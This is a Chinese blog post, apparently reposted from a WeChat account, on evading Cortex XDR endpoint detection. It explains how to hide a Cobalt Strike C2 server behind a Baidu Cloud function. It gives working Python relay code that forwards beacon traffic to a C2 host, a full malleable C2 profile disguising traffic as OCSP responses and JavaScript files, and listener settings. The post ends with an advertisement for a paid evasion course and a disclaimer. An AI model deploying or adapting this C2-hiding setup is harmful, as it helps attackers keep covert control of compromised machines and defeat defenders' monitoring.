Cortex XDR,我们可以通过尝试模块踩踏来绕过。上线到CobaltStrike之后,记住一定不要使用shell去执行,不然你会得到:
Bof去执行命令,你依然会得到检测到可疑的网路连接。我们可以通过云函数去绕过,其实就是隐藏C2。因为腾讯云的云函数的API网关已经不支持了。所以这里采用百度云即可。
在百度云中创建一个空函数,基本信息如下:
# -*- coding: utf-8 -*-# def handler(event, context):# return "Hello World"import json,requests,base64def handler(event, context):C2='https://c2:443'# 这里可以使用 HTTP、HTTPS~下角标~path=event['path']headers=event['headers']print(event)if event['httpMethod'] == 'GET' :resp=requests.get(C2+path,headers=headers,verify=False)else:resp=requests.post(C2+path,data=event['body'],headers=headers,verify=False)print(resp.headers)print(resp.content)response={"isBase64Encoded": True,"statusCode": resp.status_code,"headers": dict(resp.headers),"body": str(base64.b64encode(resp.content))[2:-1]}#return eventreturn response
创建触发器,触发器配置如下:
需要注意的是这里的URL路径为/{filepath+}即可。
C2Profile文件如下:http-get {set uri "/api/x";client {header "Accept" "*/*";metadata {base64;prepend "SESSIONID=";header "Cookie";}}server {header "Content-Type" "application/ocsp-response";header "content-transfer-encoding" "binary";header "Server" "Nodejs";output {base64;print;}}}http-stager {set uri_x86 "/vue.min.js";set uri_x64 "/bootstrap-2.min.js";}http-post {set uri "/api/y";client {header "Accept" "*/*";id {base64;prepend "JSESSION=";header "Cookie";}output {base64;print;}}server {header "Content-Type" "application/ocsp-response";header "content-transfer-encoding" "binary";header "Connection" "keep-alive";output {base64;print;}}}
那么在c2中创建监听器,需要创建Https监听器。
而地址为33ywjjk9qe610.cfc-execute.bj.baidubce.com。
Cortex XDR已经不会再报网络连接了。
https://blog.csdn.net/qq_63855540/article/details/142622565欢迎加入我的知识星球,目前正在更新免杀相关的东西,145/永久,每100人加29,每周更新2-3篇上千字PDF文档。文档中会详细描述。目前已更新106+ PDF文档,《2025年了,人生中最好的投资就是投资自己!!!》
加好友备注(星球)!!!
一些纷传的资源:
原文始发于微信公众号(Relay学安全):对抗Cortex XDR之云函数隐藏C2
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论